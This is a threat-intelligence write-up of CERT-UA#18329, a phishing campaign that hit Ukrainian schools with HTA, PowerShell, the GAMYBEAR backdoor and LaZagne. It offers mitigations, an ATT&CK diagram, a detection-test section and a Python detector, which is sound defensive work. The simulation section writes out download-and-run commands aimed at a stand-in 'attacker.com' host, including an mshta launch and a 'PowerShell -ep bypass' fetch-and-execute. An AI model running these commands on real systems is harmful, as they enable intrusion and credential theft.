Targeted cyberattack on an eastern Ukraine school using the GAMYBEAR tool (CERT-UA#18329)
Summary
A credential-harvesting campaign hit schools and public agencies in the Sumy region via a phishing email containing a ZIP attachment. Opening the archive triggered an HTA file through the mshta utility, which then pulled down PowerShell scripts to deploy the GAMYBEAR backdoor and the LaZagne credential dumper, establish HTTP-based C2, and exfiltrate files from targeted directories.
Attack Analysis
CERT-UA linked the initial breach to a phishing message sent on May 26, 2025, from a hijacked Gmail account, providing the campaign details in the CERT-UA#18329 alert. Forensic analysis exposed a multi-stage infection chain: ZIP → HTA → update.js → PowerShell → GAMYBEAR accompanied by LaZagne malware, with persistence maintained via a Run-registry entry and recurring downloads from malicious URLs.
Mitigation
Enforce multi-factor authentication for all email accounts, block execution of HTA and untrusted PowerShell scripts, lock down the registry Run key, and implement application whitelisting. Continuously update endpoint detection rules to recognize the referenced filenames, hashes, and network indicators.
Response
Promptly isolate impacted endpoints, reset the compromised Gmail credentials, gather all identified IOCs, and run comprehensive scans for GAMYBEAR, LaZagne, and associated artifacts. Inform CERT-UA about the incident and distribute IOCs through relevant threat-intelligence sharing channels.
Attack Flow
```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccccff

    %% Nodes
    action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Compromised a university Gmail account and sent spearphishing emails with a ZIP attachment named #quot;Наказ № 332#quot;."]
    class action_phishing action
    tool_mshta["<b>Tool</b> – <b>Name</b>: mshta.exe<br/><b>Technique</b>: T1218.005 System Binary Proxy Execution"]
    class tool_mshta tool
    malware_hta["<b>Malware</b> – <b>Name</b>: zvit.hta (HTML Application)<br/>Executed via the shortcut delivered in the ZIP."]
    class malware_hta malware
    action_powershell["<b>Action</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>HTA launched update.js which started updater.ps1. PowerShell downloaded additional binaries (be53ff4f4b5daa.exe, svshosts.exe) from remote HTTP servers."]
    class action_powershell action
    tool_ps2exe["<b>Tool</b> – <b>Name</b>: PS2EXE<br/><b>Technique</b>: T1027.004 Compile After Delivery (obfuscation)"]
    class tool_ps2exe tool
    action_uac_bypass["<b>Action</b> – <b>T1548.002 Abuse Elevation Control Mechanism: Bypass UAC</b><br/>Created HKCU\Software\Classes\ms-settings\Shell\Open\command key with DelegateExecute value to bypass User Account Control."]
    class action_uac_bypass action
    action_persistence["<b>Action</b> – <b>T1547.014 Boot or Logon Autostart Execution: Active Setup</b><br/>Added HKCU\Software\Microsoft\Windows\CurrentVersion\Run entries (IEUpdater, ServiceUpdateService) to launch binaries at logon."]
    class action_persistence action
    tool_registry["<b>Tool</b> – <b>Name</b>: Registry Modification<br/><b>Technique</b>: Persistence via Run keys"]
    class tool_registry tool
    action_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>Executed LaZagne (be53ff4f4b5daa.exe) to extract stored passwords and other credentials."]
    class action_credential_dump action
    tool_lazagne["<b>Tool</b> – <b>Name</b>: LaZagne<br/><b>Purpose</b>: Retrieve saved credentials from browsers, mail clients, and other applications"]
    class tool_lazagne tool
    action_data_encoding["<b>Action</b> – <b>T1132 Data Encoding</b><br/>Communications between GAMYBEAR backdoor components (svshosts.exe, ieupdater.exe) and C2 were sent over HTTP with Base64-encoded payloads."]
    class action_data_encoding action
    malware_gamybear["<b>Malware</b> – <b>Name</b>: GAMYBEAR backdoor<br/>Components include svshosts.exe and ieupdater.exe."]
    class malware_gamybear malware

    %% Connections
    action_phishing -->|delivers| tool_mshta
    tool_mshta -->|executes| malware_hta
    malware_hta -->|runs| action_powershell
    action_powershell -->|uses| tool_ps2exe
    action_powershell -->|downloads| malware_gamybear
    action_powershell -->|creates| action_uac_bypass
    action_uac_bypass -->|modifies| tool_registry
    action_persistence -->|relies on| tool_registry
    action_persistence -->|launches| malware_gamybear
    action_credential_dump -->|uses| tool_lazagne
    tool_lazagne -->|collects| action_data_encoding
    malware_gamybear -->|communicates via| action_data_encoding
    %% End of diagram
```
Detections
Detection of GAMYBEAR C2 Communication [Windows Network Connection]
Detection of GAMYBEAR Backdoor Execution [Windows File Event]
Detection of mshta.exe and PowerShell Execution with Bypass [Windows Process Creation]
IOCs (HashSha1) to detect: Cyberattack against an educational institution in eastern Ukraine using the GAMYBEAR tool (CERT-UA#18329)
IOCs (DestinationIP) to detect: Cyberattack against an educational institution in eastern Ukraine using the GAMYBEAR tool (CERT-UA#18329)
Simulations
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands:
  - Stage 1 – Deploy malicious HTA: The attacker hosts evil.hta on a compromised web server.
  - Stage 2 – Execute via mshta.exe: Using a Windows command prompt, the attacker runs `mshta.exe http://attacker.com/evil.hta`. This creates a process-creation event with mshta.exe in the command line, satisfying the first clause of the rule.
  - Stage 3 – PowerShell bypass: To run a payload that circumvents the system's Execution Policy, the attacker launches PowerShell with the `-ep bypass` flag: `PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMP\p.ps1; & $env:TEMP\p.ps1"`. This generates a second process-creation event containing the exact string `PowerShell -ep bypass`, satisfying the second clause.
- Regression Test Script: The following PowerShell script reproduces the above steps in an automated, repeatable fashion.

```powershell
# -------------------------------------------------
# Regression Test – Trigger Sigma Rule for mshta & PowerShell -ep bypass
# -------------------------------------------------

# Variables – adjust to your lab environment
$htaUrl = "http://127.0.0.1/evil.hta"     # Must point to a reachable HTA file
$psUrl  = "http://127.0.0.1/payload.ps1"  # Simple PS payload (e.g., `Write-Host "pwned"`)

# 1. Invoke mshta.exe
Write-Host "[*] Launching mshta.exe against $htaUrl"
Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow

# Short pause to ensure the process logs
Start-Sleep -Seconds 2

# 2. Invoke PowerShell with execution-policy bypass
$psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMP\p.ps1; & $env:TEMP\p.ps1"
Write-Host "[*] Launching PowerShell -ep bypass"
Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow

# Pause to allow logging
Start-Sleep -Seconds 5
Write-Host "[+] Test complete. Check your SIEM for alerts."
```
- Cleanup Commands: Remove temporary files and terminate any lingering test processes.

```powershell
# Cleanup temporary payload
Remove-Item -Path "$env:TEMP\p.ps1" -ErrorAction SilentlyContinue

# Optionally kill lingering mshta or PowerShell instances spawned by the test
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -ne $PID } |
    Stop-Process -Force
```
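The two clauses the simulation above is meant to trigger (mshta.exe in a command line, and PowerShell launched with an execution-policy bypass) can be checked offline against process-creation telemetry before the regression test is run. The following is an added example written for this page, not the page's own detection rule: the events are constructed Sysmon-style records, the parent-image allowlist and the 60-second chain window are assumptions, and the PowerShell clause is deliberately broader than the rule's literal `PowerShell -ep bypass` string (it also matches `-ex`, `-exec` and `-ExecutionPolicy`, all of which PowerShell accepts).

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "ts": 100, "cmd": "mshta.exe http://127.0.0.1/zvit.hta",
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "ws01", "ts": 104, "cmd": r"wscript.exe C:\Users\u\AppData\Local\Temp\update.js",
     "parent": r"C:\Windows\System32\mshta.exe"},
    {"host": "ws01", "ts": 107, "cmd": r'PowerShell -ep bypass -Command "& $env:TEMP\updater.ps1"',
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"host": "ws02", "ts": 200, "cmd": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"host": "ws03", "ts": 300, "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\sccm\fix.ps1",
     "parent": r"C:\Windows\CCM\CcmExec.exe"},
]

# Clause 1: mshta.exe anywhere in the command line (paths and quoting tolerated).
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)
# Clause 2: PowerShell with an execution-policy bypass. Broader than the rule's literal
# "PowerShell -ep bypass": -ex, -exec and -ExecutionPolicy are accepted prefixes too.
PS_BYPASS_RE = re.compile(r"\bpowershell(?:\.exe)?\b.*?\s-e(?:p|x[a-z]*)\s+bypass\b", re.IGNORECASE)
# Assumed tuning allowlist: management agents known to launch scripts with a bypass.
PARENT_ALLOWLIST = {r"c:\windows\ccm\ccmexec.exe"}
CHAIN_WINDOW = 60  # seconds between mshta and the PowerShell bypass to treat them as one chain

def classify(event):
    """Return the clause an event satisfies ("mshta" or "ps_bypass"), or None."""
    if MSHTA_RE.search(event["cmd"]):
        return "mshta"
    if PS_BYPASS_RE.search(event["cmd"]) and event["parent"].lower() not in PARENT_ALLOWLIST:
        return "ps_bypass"
    return None

def detect(events):
    """Alert per matching event; escalate when both clauses fire on one host within CHAIN_WINDOW."""
    alerts, last_mshta = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        clause = classify(ev)
        if clause is None:
            continue
        severity = "medium"
        if clause == "mshta":
            last_mshta[ev["host"]] = ev["ts"]
        elif ev["host"] in last_mshta and ev["ts"] - last_mshta[ev["host"]] <= CHAIN_WINDOW:
            severity = "high"  # mshta -> ... -> PowerShell -ep bypass, the chain in this report
        alerts.append((ev["host"], ev["ts"], clause, severity))
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields a medium alert for the mshta launch on ws01 and a high alert for the PowerShell bypass that follows it seven seconds later, while the plain `-NoProfile` invocation and the allowlisted SCCM-parented bypass produce nothing.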